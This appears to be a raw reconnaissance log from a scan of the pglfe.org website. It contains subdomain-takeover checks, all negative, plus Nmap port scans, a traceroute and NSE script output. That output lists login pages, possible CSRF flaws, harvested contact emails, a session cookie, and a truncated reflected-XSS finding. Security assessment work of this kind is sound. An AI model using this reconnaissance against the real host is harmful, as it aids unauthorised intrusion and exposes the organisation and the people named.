3627[Not Vulnerable] sandbox.www.pglfe.org
3628[Not Vulnerable] singedwww.pglfe.org
3629[Not Vulnerable] serverwww.pglfe.org
3630[Not Vulnerable] service-www.pglfe.org
3631[Not Vulnerable] servicewww.pglfe.org
3632[Not Vulnerable] staff.www.pglfe.org
3633[Not Vulnerable] staging.www.pglfe.org
3634[Not Vulnerable] stagewww.pglfe.org
3635[Not Vulnerable] stagingwww.pglfe.org
3636[Not Vulnerable] static.www.pglfe.org
3637[Not Vulnerable] static-www.pglfe.org
3638[Not Vulnerable] staticwww.pglfe.org
3639[Not Vulnerable] support-www.pglfe.org
3640[Not Vulnerable] stgwww.pglfe.org
3641[Not Vulnerable] stg.www.pglfe.org
3642[Not Vulnerable] svcgateway.www.pglfe.org
3643[Not Vulnerable] svcgateway-www.pglfe.org
3644[Not Vulnerable] supportwww.pglfe.org
3645[Not Vulnerable] stg-www.pglfe.org
3646[Not Vulnerable] svcgatewaywww.pglfe.org
3647[Not Vulnerable] svc.www.pglfe.org
3648[Not Vulnerable] swagger-www.pglfe.org
3649[Not Vulnerable] svc-www.pglfe.org
3650[Not Vulnerable] swaggerwww.pglfe.org
3651[Not Vulnerable] testing1.www.pglfe.org
3652[Not Vulnerable] testing1www.pglfe.org
3653[Not Vulnerable] testing-www.pglfe.org
3654[Not Vulnerable] swagger.www.pglfe.org
3655[Not Vulnerable] testing.www.pglfe.org
3656[Not Vulnerable] testingwww.pglfe.org
3657[Not Vulnerable] spring-www.pglfe.org
3658[Not Vulnerable] spring.www.pglfe.org
3659[Not Vulnerable] springwww.pglfe.org
3660[Not Vulnerable] ssl-www.pglfe.org
3661[Not Vulnerable] testbed.www.pglfe.org
3662[Not Vulnerable] ssl.www.pglfe.org
3663[Not Vulnerable] stage1.www.pglfe.org
3664[Not Vulnerable] stage1-www.pglfe.org
3665[Not Vulnerable] stage-www.pglfe.org
3666[Not Vulnerable] stage.www.pglfe.org
3667[Not Vulnerable] s-www.pglfe.org
3668[Not Vulnerable] s.www.pglfe.org
3669[Not Vulnerable] swww.pglfe.org
3670[Not Vulnerable] system-www.pglfe.org
3671[Not Vulnerable] system.www.pglfe.org
3672[Not Vulnerable] team-www.pglfe.org
3673[Not Vulnerable] systemwww.pglfe.org
3674[Not Vulnerable] team.www.pglfe.org
3675[Not Vulnerable] test1www.pglfe.org
3676[Not Vulnerable] test1.www.pglfe.org
3677[Not Vulnerable] testing1-www.pglfe.org
3678[Not Vulnerable] testbedwww.pglfe.org
3679[Not Vulnerable] teamwww.pglfe.org
3680[Not Vulnerable] test-www.pglfe.org
3681[Not Vulnerable] trialwww.pglfe.org
3682[Not Vulnerable] tr.www.pglfe.org
3683[Not Vulnerable] trwww.pglfe.org
3684[Not Vulnerable] turkey.www.pglfe.org
3685[Not Vulnerable] turkwww.pglfe.org
3686[Not Vulnerable] turkey-www.pglfe.org
3687[Not Vulnerable] tur.www.pglfe.org
3688[Not Vulnerable] test.www.pglfe.org
3689[Not Vulnerable] testwww.pglfe.org
3690[Not Vulnerable] tomcat-www.pglfe.org
3691[Not Vulnerable] tomcat.www.pglfe.org
3692[Not Vulnerable] tomcatwww.pglfe.org
3693[Not Vulnerable] toolbar-www.pglfe.org
3694[Not Vulnerable] toolbar.www.pglfe.org
3695[Not Vulnerable] tpe-www.pglfe.org
3696[Not Vulnerable] tpe.www.pglfe.org
3697[Not Vulnerable] toolbarwww.pglfe.org
3698[Not Vulnerable] t.www.pglfe.org
3699[Not Vulnerable] training-www.pglfe.org
3700[Not Vulnerable] uat.www.pglfe.org
3701[Not Vulnerable] training.www.pglfe.org
3702[Not Vulnerable] trainingwww.pglfe.org
3703[Not Vulnerable] train.www.pglfe.org
3704[Not Vulnerable] trainwww.pglfe.org
3705[Not Vulnerable] us-www.pglfe.org
3706[Not Vulnerable] us.www.pglfe.org
3707[Not Vulnerable] v1-www.pglfe.org
3708[Not Vulnerable] v2.www.pglfe.org
3709[Not Vulnerable] trial-www.pglfe.org
3710[Not Vulnerable] v3www.pglfe.org
3711[Not Vulnerable] uatwww.pglfe.org
3712[Not Vulnerable] vi-www.pglfe.org
3713[Not Vulnerable] trial.www.pglfe.org
3714[Not Vulnerable] v.www.pglfe.org
3715[Not Vulnerable] viwww.pglfe.org
3716[Not Vulnerable] v1www.pglfe.org
3717[Not Vulnerable] w3.www.pglfe.org
3718[Not Vulnerable] v2-www.pglfe.org
3719[Not Vulnerable] turkeywww.pglfe.org
3720[Not Vulnerable] turk-www.pglfe.org
3721[Not Vulnerable] turk.www.pglfe.org
3722[Not Vulnerable] tur-www.pglfe.org
3723[Not Vulnerable] turwww.pglfe.org
3724[Not Vulnerable] web1-www.pglfe.org
3725[Not Vulnerable] v3-www.pglfe.org
3726[Not Vulnerable] uat-www.pglfe.org
3727[Not Vulnerable] twww.pglfe.org
3728[Not Vulnerable] westeurope.www.pglfe.org
3729[Not Vulnerable] www.01.pglfe.org
3730[Not Vulnerable] uswww.pglfe.org
3731[Not Vulnerable] train-www.pglfe.org
3732[Not Vulnerable] v1.www.pglfe.org
3733[Not Vulnerable] www.04.pglfe.org
3734[Not Vulnerable] www10.pglfe.org
3735[Not Vulnerable] web1.www.pglfe.org
3736[Not Vulnerable] web1www.pglfe.org
3737[Not Vulnerable] webapp-www.pglfe.org
3738[Not Vulnerable] webapp.www.pglfe.org
3739[Not Vulnerable] v2www.pglfe.org
3740[Not Vulnerable] web.www.pglfe.org
3741[Not Vulnerable] webwww.pglfe.org
3742[Not Vulnerable] v3.www.pglfe.org
3743[Not Vulnerable] westeurope-www.pglfe.org
3744[Not Vulnerable] westeuropewww.pglfe.org
3745[Not Vulnerable] www.00.pglfe.org
3746[Not Vulnerable] www.11.pglfe.org
3747[Not Vulnerable] www11.pglfe.org
3748[Not Vulnerable] vpn.www.pglfe.org
3749[Not Vulnerable] vpnwww.pglfe.org
3750[Not Vulnerable] vpn-www.pglfe.org
3751[Not Vulnerable] www-11.pglfe.org
3752[Not Vulnerable] v-www.pglfe.org
3753[Not Vulnerable] www-12.pglfe.org
3754[Not Vulnerable] www12.pglfe.org
3755[Not Vulnerable] vwww.pglfe.org
3756[Not Vulnerable] www-13.pglfe.org
3757[Not Vulnerable] www.13.pglfe.org
3758[Not Vulnerable] w3-www.pglfe.org
3759[Not Vulnerable] w3www.pglfe.org
3760[Not Vulnerable] www.16.pglfe.org
3761[Not Vulnerable] www.18.pglfe.org
3762[Not Vulnerable] www18.pglfe.org
3763[Not Vulnerable] www.19.pglfe.org
3764[Not Vulnerable] www19.pglfe.org
3765[Not Vulnerable] www-1.pglfe.org
3766[Not Vulnerable] www-19.pglfe.org
3767[Not Vulnerable] www.1.pglfe.org
3768[Not Vulnerable] webappwww.pglfe.org
3769[Not Vulnerable] web-www.pglfe.org
3770[Not Vulnerable] www1.pglfe.org
3771[Not Vulnerable] www.2009.pglfe.org
3772[Not Vulnerable] www-2009.pglfe.org
3773[Not Vulnerable] www2009.pglfe.org
3774[Not Vulnerable] www-2010.pglfe.org
3775[Not Vulnerable] www2010.pglfe.org
3776[Not Vulnerable] www-2011.pglfe.org
3777[Not Vulnerable] www13.pglfe.org
3778[Not Vulnerable] www-14.pglfe.org
3779[Not Vulnerable] www.14.pglfe.org
3780[Not Vulnerable] www.02.pglfe.org
3781[Not Vulnerable] www.2015.pglfe.org
3782[Not Vulnerable] www-2016.pglfe.org
3783[Not Vulnerable] www2016.pglfe.org
3784[Not Vulnerable] www-20.pglfe.org
3785[Not Vulnerable] www.20.pglfe.org
3786[Not Vulnerable] www20.pglfe.org
3787[Not Vulnerable] www-15.pglfe.org
3788[Not Vulnerable] www15.pglfe.org
3789[Not Vulnerable] www.15.pglfe.org
3790[Not Vulnerable] www.2014.pglfe.org
3791[Not Vulnerable] www-16.pglfe.org
3792[Not Vulnerable] www.17.pglfe.org
3793[Not Vulnerable] www-17.pglfe.org
3794[Not Vulnerable] www-18.pglfe.org
3795[Not Vulnerable] www17.pglfe.org
3796[Not Vulnerable] www16.pglfe.org
3797[Not Vulnerable] www.2011.pglfe.org
3798[Not Vulnerable] www.2012.pglfe.org
3799[Not Vulnerable] www2012.pglfe.org
3800[Not Vulnerable] www-2013.pglfe.org
3801[Not Vulnerable] www.2013.pglfe.org
3802[Not Vulnerable] www-2014.pglfe.org
3803[Not Vulnerable] www-2015.pglfe.org
3804[Not Vulnerable] www2014.pglfe.org
3805[Not Vulnerable] www2011.pglfe.org
3806[Not Vulnerable] www2015.pglfe.org
3807[Not Vulnerable] www2013.pglfe.org
3808[Not Vulnerable] www.2016.pglfe.org
3809[Not Vulnerable] www-2.pglfe.org
3810[Not Vulnerable] www.2.pglfe.org
3811[Not Vulnerable] www.8.pglfe.org
3812[Not Vulnerable] www.accept.pglfe.org
3813[Not Vulnerable] www2.pglfe.org
3814[Not Vulnerable] wwwaccounting.pglfe.org
3815[Not Vulnerable] www-3.pglfe.org
3816[Not Vulnerable] www.account.pglfe.org
3817[Not Vulnerable] www3.pglfe.org
3818[Not Vulnerable] www3.www.pglfe.org
3819[Not Vulnerable] www3www.pglfe.org
3820[Not Vulnerable] www-4.pglfe.org
3821[Not Vulnerable] wwwaccount.pglfe.org
3822[Not Vulnerable] www.accounts.pglfe.org
3823[Not Vulnerable] www4.pglfe.org
3824[Not Vulnerable] wwwaccounts.pglfe.org
3825[Not Vulnerable] www-5.pglfe.org
3826[Not Vulnerable] www.5.pglfe.org
3827[Not Vulnerable] www5.pglfe.org
3828[Not Vulnerable] www-acc.pglfe.org
3829[Not Vulnerable] www.6.pglfe.org
3830[Not Vulnerable] www.acc.pglfe.org
3831[Not Vulnerable] wwwacc.pglfe.org
3832[Not Vulnerable] www-6.pglfe.org
3833[Not Vulnerable] www.7.pglfe.org
3834[Not Vulnerable] www-8.pglfe.org
3835[Not Vulnerable] www-administrator.pglfe.org
3836[Not Vulnerable] www-7.pglfe.org
3837[Not Vulnerable] www.admin.pglfe.org
3838[Not Vulnerable] www.admins.pglfe.org
3839[Not Vulnerable] www8.pglfe.org
3840[Not Vulnerable] wwwadmins.pglfe.org
3841[Not Vulnerable] www-adm.pglfe.org
3842[Not Vulnerable] www.admin1.pglfe.org
3843[Not Vulnerable] www-admin1.pglfe.org
3844[Not Vulnerable] www.adm.pglfe.org
3845[Not Vulnerable] www-akali.pglfe.org
3846[Not Vulnerable] www.akali.pglfe.org
3847[Not Vulnerable] wwwakali.pglfe.org
3848[Not Vulnerable] wwwadm.pglfe.org
3849[Not Vulnerable] www.administrator.pglfe.org
3850[Not Vulnerable] www-9.pglfe.org
3851[Not Vulnerable] www9.pglfe.org
3852[Not Vulnerable] www-accept.pglfe.org
3853[Not Vulnerable] wwwaccept.pglfe.org
3854[Not Vulnerable] www-accounting.pglfe.org
3855[Not Vulnerable] www.accounting.pglfe.org
3856[Not Vulnerable] www-account.pglfe.org
3857[Not Vulnerable] www-a.pglfe.org
3858[Not Vulnerable] wwwapache.pglfe.org
3859[Not Vulnerable] wwwadmin1.pglfe.org
3860[Not Vulnerable] www.administrators.pglfe.org
3861[Not Vulnerable] www-administrators.pglfe.org
3862[Not Vulnerable] www-alpha.pglfe.org
3863[Not Vulnerable] wwwadministrators.pglfe.org
3864[Not Vulnerable] www.alpha.pglfe.org
3865[Not Vulnerable] wwwalpha.pglfe.org
3866[Not Vulnerable] www.analytics.pglfe.org
3867[Not Vulnerable] www-analytics.pglfe.org
3868[Not Vulnerable] wwwadmin.pglfe.org
3869[Not Vulnerable] www-admin.pglfe.org
3870[Not Vulnerable] www-admins.pglfe.org
3871[Not Vulnerable] www.apac.pglfe.org
3872[Not Vulnerable] wwwapac.pglfe.org
3873[Not Vulnerable] www.a.pglfe.org
3874[Not Vulnerable] www-api1.pglfe.org
3875[Not Vulnerable] wwwa.pglfe.org
3876[Not Vulnerable] www.api1.pglfe.org
3877[Not Vulnerable] www-api-docs.pglfe.org
3878[Not Vulnerable] wwwakamai.pglfe.org
3879[Not Vulnerable] www-akamai.pglfe.org
3880[Not Vulnerable] wwwapollo.pglfe.org
3881[Not Vulnerable] wwwapril.pglfe.org
3882[Not Vulnerable] www-alt.pglfe.org
3883[Not Vulnerable] www-auth.pglfe.org
3884[Not Vulnerable] www.auth.pglfe.org
3885[Not Vulnerable] www.alt.pglfe.org
3886[Not Vulnerable] wwwalt.pglfe.org
3887[Not Vulnerable] wwwauth.pglfe.org
3888[Not Vulnerable] www.america.pglfe.org
3889[Not Vulnerable] wwwamerica.pglfe.org
3890[Not Vulnerable] www-america.pglfe.org
3891[Not Vulnerable] www-aws.pglfe.org
3892[Not Vulnerable] www-apache.pglfe.org
3893[Not Vulnerable] www.apache.pglfe.org
3894[Not Vulnerable] www-apac.pglfe.org
3895[Not Vulnerable] www.aws.pglfe.org
3896[Not Vulnerable] wwwapi-docs.pglfe.org
3897[Not Vulnerable] www-api.pglfe.org
3898[Not Vulnerable] wwwaws.pglfe.org
3899[Not Vulnerable] www.api.pglfe.org
3900[Not Vulnerable] www.azure.pglfe.org
3901[Not Vulnerable] www-backend.pglfe.org
3902[Not Vulnerable] www.backend.pglfe.org
3903[Not Vulnerable] www-beta.pglfe.org
3904[Not Vulnerable] wwwbackend.pglfe.org
3905[Not Vulnerable] www.beta.pglfe.org
3906[Not Vulnerable] www.boards.pglfe.org
3907[Not Vulnerable] wwwbilling.pglfe.org
3908[Not Vulnerable] www-billing.pglfe.org
3909[Not Vulnerable] www.billing.pglfe.org
3910[Not Vulnerable] wwwbeta.pglfe.org
3911[Not Vulnerable] wwwboards.pglfe.org
3912[Not Vulnerable] www-box.pglfe.org
3913[Not Vulnerable] www.box.pglfe.org
3914[Not Vulnerable] wwwbox.pglfe.org
3915[Not Vulnerable] www-b.pglfe.org
3916[Not Vulnerable] www.b.pglfe.org
3917[Not Vulnerable] wwwb.pglfe.org
3918[Not Vulnerable] www.9.pglfe.org
3919[Not Vulnerable] wwwapi.pglfe.org
3920[Not Vulnerable] www-apollo.pglfe.org
3921[Not Vulnerable] www.apollo.pglfe.org
3922[Not Vulnerable] www-application.pglfe.org
3923[Not Vulnerable] www.brand.pglfe.org
3924[Not Vulnerable] wwwapplication.pglfe.org
3925[Not Vulnerable] www-app.pglfe.org
3926[Not Vulnerable] wwwapp.pglfe.org
3927[Not Vulnerable] www-april.pglfe.org
3928[Not Vulnerable] www.april.pglfe.org
3929[Not Vulnerable] www.cert.pglfe.org
3930[Not Vulnerable] www-cert.pglfe.org
3931[Not Vulnerable] www-brand.pglfe.org
3932[Not Vulnerable] wwwcert.pglfe.org
3933[Not Vulnerable] www-azure.pglfe.org
3934[Not Vulnerable] wwwci.pglfe.org
3935[Not Vulnerable] www.brasil.pglfe.org
3936[Not Vulnerable] wwwbrasil.pglfe.org
3937[Not Vulnerable] www-brazil.pglfe.org
3938[Not Vulnerable] www.brazil.pglfe.org
3939[Not Vulnerable] www-brasil.pglfe.org
3940[Not Vulnerable] wwwbrazil.pglfe.org
3941[Not Vulnerable] www-cloudfront.pglfe.org
3942[Not Vulnerable] www.bucket.pglfe.org
3943[Not Vulnerable] wwwbucket.pglfe.org
3944[Not Vulnerable] www-bucket.pglfe.org
3945[Not Vulnerable] www-bucky.pglfe.org
3946[Not Vulnerable] wwwbucky.pglfe.org
3947[Not Vulnerable] www-cdn.pglfe.org
3948[Not Vulnerable] www.cdn.pglfe.org
3949[Not Vulnerable] wwwcdn.pglfe.org
3950[Not Vulnerable] www-cf.pglfe.org
3951[Not Vulnerable] www.cf.pglfe.org
3952[Not Vulnerable] wwwcf.pglfe.org
3953[Not Vulnerable] www-cgi.pglfe.org
3954[Not Vulnerable] wwwcloudfront.pglfe.org
3955[Not Vulnerable] www.cgi.pglfe.org
3956[Not Vulnerable] www.chd.pglfe.org
3957[Not Vulnerable] www-chef.pglfe.org
3958[Not Vulnerable] wwwchef.pglfe.org
3959[Not Vulnerable] www.chef.pglfe.org
3960[Not Vulnerable] www-ci.pglfe.org
3961[Not Vulnerable] www.ci.pglfe.org
3962[Not Vulnerable] www-confluence.pglfe.org
3963[Not Vulnerable] wwwcom.pglfe.org
3964[Not Vulnerable] wwwconfluence.pglfe.org
3965[Not Vulnerable] www-container.pglfe.org
3966[Not Vulnerable] www-client.pglfe.org
3967[Not Vulnerable] wwwclient.pglfe.org
3968[Not Vulnerable] www.container.pglfe.org
3969[Not Vulnerable] www.control.pglfe.org
3970[Not Vulnerable] www-cms1.pglfe.org
3971[Not Vulnerable] wwwcontrol.pglfe.org
3972[Not Vulnerable] www.cloudfront.pglfe.org
3973[Not Vulnerable] www.cms.pglfe.org
3974[Not Vulnerable] www-cvs.pglfe.org
3975[Not Vulnerable] www-com.pglfe.org
3976[Not Vulnerable] wwwcms.pglfe.org
3977[Not Vulnerable] www.cvs.pglfe.org
3978[Not Vulnerable] www-data.pglfe.org
3979[Not Vulnerable] wwwc.pglfe.org
3980[Not Vulnerable] wwwdec.pglfe.org
3981[Not Vulnerable] wwwdev1.pglfe.org
3982[Not Vulnerable] wwwcontainer.pglfe.org
3983[Not Vulnerable] www-developer.pglfe.org
3984[Not Vulnerable] www-c.pglfe.org
3985[Not Vulnerable] www-development.pglfe.org
3986[Not Vulnerable] wwwdeveloper.pglfe.org
3987[Not Vulnerable] wwwdevs.pglfe.org
3988[Not Vulnerable] wwwcms1.pglfe.org
3989[Not Vulnerable] www.cms1.pglfe.org
3990[Not Vulnerable] www-cms.pglfe.org
3991[Not Vulnerable] www-cn.pglfe.org
3992[Not Vulnerable] wwwcn.pglfe.org
3993[Not Vulnerable] www.com.pglfe.org
3994[Not Vulnerable] www.cn.pglfe.org
3995[Not Vulnerable] wwwdisabled.pglfe.org
3996[Not Vulnerable] www-docker.pglfe.org
3997[Not Vulnerable] www.dev.pglfe.org
3998[Not Vulnerable] wwwdev.pglfe.org
3999[Not Vulnerable] www-docsdrop.pglfe.org
4000[Not Vulnerable] www.docs.pglfe.org
4001[Not Vulnerable] www.docsdrop.pglfe.org
4002[Not Vulnerable] wwwcvs.pglfe.org
4003[Not Vulnerable] www-docs.pglfe.org
4004[Not Vulnerable] www.data.pglfe.org
4005[Not Vulnerable] www-dec.pglfe.org
4006[Not Vulnerable] www-drop.pglfe.org
4007[Not Vulnerable] www.dec.pglfe.org
4008[Not Vulnerable] www-demo.pglfe.org
4009[Not Vulnerable] www.demo.pglfe.org
4010[Not Vulnerable] www-dev1.pglfe.org
4011[Not Vulnerable] www.dev1.pglfe.org
4012[Not Vulnerable] www.disabled.pglfe.org
4013[Not Vulnerable] www.development.pglfe.org
4014[Not Vulnerable] www.elastic.pglfe.org
4015[Not Vulnerable] wwwelastic.pglfe.org
4016[Not Vulnerable] www-devops.pglfe.org
4017[Not Vulnerable] www-elastic.pglfe.org
4018[Not Vulnerable] www.devops.pglfe.org
4019[Not Vulnerable] www-dev.pglfe.org
4020[Not Vulnerable] wwwdevops.pglfe.org
4021[Not Vulnerable] wwwdrop.pglfe.org
4022[Not Vulnerable] wwwelb.pglfe.org
4023[Not Vulnerable] wwwemea.pglfe.org
4024[Not Vulnerable] www.devs.pglfe.org
4025[Not Vulnerable] www.engima.pglfe.org
4026[Not Vulnerable] wwwengima.pglfe.org
4027[Not Vulnerable] www-engineering.pglfe.org
4028[Not Vulnerable] www-disabled.pglfe.org
4029[Not Vulnerable] www.docker.pglfe.org
4030[Not Vulnerable] wwwdocker.pglfe.org
4031[Not Vulnerable] www.engineering.pglfe.org
4032[Not Vulnerable] wwwengineering.pglfe.org
4033[Not Vulnerable] www.elb.pglfe.org
4034[Not Vulnerable] www-engine.pglfe.org
4035[Not Vulnerable] www.engine.pglfe.org
4036[Not Vulnerable] www-elb.pglfe.org
4037[Not Vulnerable] www.eu.pglfe.org
4038[Not Vulnerable] www-engima.pglfe.org
4039[Not Vulnerable] wwweu.pglfe.org
4040[Not Vulnerable] www-europe.pglfe.org
4041[Not Vulnerable] www.europe.pglfe.org
4042[Not Vulnerable] wwweurope.pglfe.org
4043[Not Vulnerable] www-europewest.pglfe.org
4044[Not Vulnerable] wwwdocs.pglfe.org
4045[Not Vulnerable] www.edge.pglfe.org
4046[Not Vulnerable] www.europewest.pglfe.org
4047[Not Vulnerable] wwwedge.pglfe.org
4048[Not Vulnerable] www-elasticbeanstalk.pglfe.org
4049[Not Vulnerable] wwwengine.pglfe.org
4050[Not Vulnerable] wwweng.pglfe.org
4051[Not Vulnerable] www.eng.pglfe.org
4052[Not Vulnerable] www-eng.pglfe.org
4053[Not Vulnerable] www-eu.pglfe.org
4054[Not Vulnerable] www-euwe.pglfe.org
4055[Not Vulnerable] wwweuropewest.pglfe.org
4056[Not Vulnerable] www.euwe.pglfe.org
4057[Not Vulnerable] www.elasticbeanstalk.pglfe.org
4058[Not Vulnerable] wwweuwe.pglfe.org
4059[Not Vulnerable] wwwelasticbeanstalk.pglfe.org
4060[Not Vulnerable] wwwemail.pglfe.org
4061[Not Vulnerable] www-emea.pglfe.org
4062[Not Vulnerable] www.emea.pglfe.org
4063[Not Vulnerable] www-feb.pglfe.org
4064[Not Vulnerable] www-euw.pglfe.org
4065[Not Vulnerable] www.fet.pglfe.org
4066[Not Vulnerable] wwweuw.pglfe.org
4067[Not Vulnerable] www.euw.pglfe.org
4068[Not Vulnerable] www-evelynn.pglfe.org
4069[Not Vulnerable] wwwfirewall.pglfe.org
4510#######################################################################################################################################
WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:22 EST
Nmap scan report for www.pglfe.org (192.252.144.58)
Host is up (0.24s latency).
Not shown: 486 filtered ports, 3 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
143/tcp open imap
443/tcp open https
587/tcp open submission
993/tcp open imaps
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 235.63 seconds
4527#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:25 EST
Nmap scan report for www.pglfe.org (192.252.144.58)
Host is up (0.15s latency).
Not shown: 2 filtered ports, 1 closed port
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
88/udp open|filtered kerberos-sec
123/udp open|filtered ntp
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
389/udp open|filtered ldap
500/udp open|filtered isakmp
520/udp open|filtered route

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds
4547#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:26 EST
Nmap scan report for www.pglfe.org (192.252.144.58)
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
21/tcp filtered ftp
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 131.63 ms 10.245.200.1
2 ...
3 132.40 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 132.28 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 137.41 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 159.92 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 167.73 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 164.50 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 167.69 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 164.59 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 259.36 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 260.12 ms 204.70.192.125
13 254.31 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 259.89 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 252.82 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 256.28 ms 64.89.38.2
17 260.39 ms 192.252.144.58
4576#######################################################################################################################################
4577Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:30 EST
4578NSE: Loaded 163 scripts for scanning.
4579NSE: Script Pre-scanning.
4580Initiating NSE at 08:30
4581Completed NSE at 08:30, 0.00s elapsed
4582Initiating NSE at 08:30
4583Completed NSE at 08:30, 0.00s elapsed
4584Initiating Parallel DNS resolution of 1 host. at 08:30
4585Completed Parallel DNS resolution of 1 host. at 08:30, 0.02s elapsed
4586Initiating SYN Stealth Scan at 08:30
4587Scanning www.pglfe.org (192.252.144.58) [1 port]
4588Discovered open port 80/tcp on 192.252.144.58
4589Completed SYN Stealth Scan at 08:30, 0.28s elapsed (1 total ports)
4590Initiating Service scan at 08:30
4591Scanning 1 service on www.pglfe.org (192.252.144.58)
4592Completed Service scan at 08:30, 6.52s elapsed (1 service on 1 host)
4593Initiating OS detection (try #1) against www.pglfe.org (192.252.144.58)
4594Retrying OS detection (try #2) against www.pglfe.org (192.252.144.58)
4595Initiating Traceroute at 08:30
4596Completed Traceroute at 08:30, 3.02s elapsed
4597Initiating Parallel DNS resolution of 16 hosts. at 08:30
4598Completed Parallel DNS resolution of 16 hosts. at 08:30, 0.24s elapsed
4599NSE: Script scanning 192.252.144.58.
4600Initiating NSE at 08:30
4601Completed NSE at 08:33, 145.33s elapsed
4602Initiating NSE at 08:33
4603Completed NSE at 08:33, 1.09s elapsed
Nmap scan report for www.pglfe.org (192.252.144.58)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
4609| http-auth-finder:
4610| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4611| url method
4612| http://www.pglfe.org:80/pglfe_sec/secretary_login.php FORM
4613| http://www.pglfe.org:80/dgracfe_officers/officer_login.php FORM
4614| http://www.pglfe.org:80/pglfe_doc/doc_login.php FORM
4615|_ http://www.pglfe.org:80/dgracfe_reg/registrar_login.php FORM
4616| http-brute:
4617|_ Path "/" does not require authentication
4618|_http-chrono: Request times for /; avg: 1797.24ms; min: 1635.37ms; max: 2214.28ms
4619| http-csrf:
4620| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4621| Found the following possible CSRF vulnerabilities:
4622|
4623| Path: http://www.pglfe.org:80/pglfe_sec/secretary_login.php
4624| Form id: loginbg
4625| Form action: secretary_login.php
4626|
4627| Path: http://www.pglfe.org:80/dgracfe_officers/officer_login.php
4628| Form id: loginbg
4629| Form action: officer_login.php
4630|
4631| Path: http://www.pglfe.org:80/pglfe_doc/doc_login.php
4632| Form id: loginbg
4633| Form action: doc_login.php
4634|
4635| Path: http://www.pglfe.org:80/dgracfe_reg/registrar_login.php
4636| Form id: loginbg
4637|_ Form action: /dgracfe_reg/registrar_login.php
4638|_http-date: Mon, 25 Nov 2019 13:31:07 GMT; -1s from local time.
4639|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
4640|_http-dombased-xss: Couldn't find any DOM based XSS.
4641|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
4642| http-errors:
4643| Spidering limited to: maxpagecount=40; withinhost=www.pglfe.org
4644| Found the following error pages:
4645|
4646| Error Code: 400
4647| http://www.pglfe.org:80
4648|
4649| Error Code: 404
4650| http://www.pglfe.org:80/%0amembers/member_login.php?to_page=articles
4651|
4652| Error Code: 404
4653| http://www.pglfe.org:80/_include/css/style-redish.css
4654|
4655| Error Code: 404
4656| http://www.pglfe.org:80/_include/css/style-dirtyblue.css
4657|
4658| Error Code: 404
4659|_ http://www.pglfe.org:80/%0a%22_include/images/lodges-racs-km-logo/AG1001logofront.jpg%22
4660|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
4661|_http-feed: Couldn't find any feeds.
4662|_http-fetch: Please enter the complete path of the directory to save data in.
4663| http-grep:
4664| (1) http://www.pglfe.org:80/emerald883.php:
4665| (1) email:
4666| + 883sec@pglfe.org
4667| (1) http://www.pglfe.org:80/dgracfe_officers.php:
4668| (1) email:
4669| + dgracregistrar@dgracfeic.org
4670| (1) http://www.pglfe.org:80/badenpowell929.php:
4671| (1) email:
4672| + 929sec@pglfe.org
4673| (1) http://www.pglfe.org:80/pglfe_lodges.php:
4674| (1) email:
4675| + pglsec@pglfe.org
4676| (1) http://www.pglfe.org:80/km_officers_hk.php:
4677| (1) email:
4678|_ + council@freemason.ie
4679| http-headers:
4680| Date: Mon, 25 Nov 2019 13:31:01 GMT
4681| Server: Apache
4682| Expires: Thu, 19 Nov 1981 08:52:00 GMT
4683| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
4684| Pragma: no-cache
4685| Set-Cookie: pglfesesid=25207dd47c5a77821df47e2e1406d725; path=/
4686| Upgrade: h2
4687| Connection: Upgrade, close
4688| Content-Type: text/html
4689|
4690|_ (Request type: HEAD)
4691|_http-jsonp-detection: Couldn't find any JSONP endpoints.
4692| http-methods:
4693|_ Supported Methods: GET HEAD POST OPTIONS
4694|_http-mobileversion-checker: No mobile version detected.
4695| http-php-version: Logo query returned unknown hash d84a43d08b7ff8f2e2b1314c4f1b7d0a
4696|_Credits query returned unknown hash d84a43d08b7ff8f2e2b1314c4f1b7d0a
4697| http-phpself-xss:
4698| VULNERABLE:
4699| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
4700| State: VULNERABLE (Exploitable)
4701| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
4702|
4703| Extra information:
4704|
4705| Vulnerable files with proof of concept:
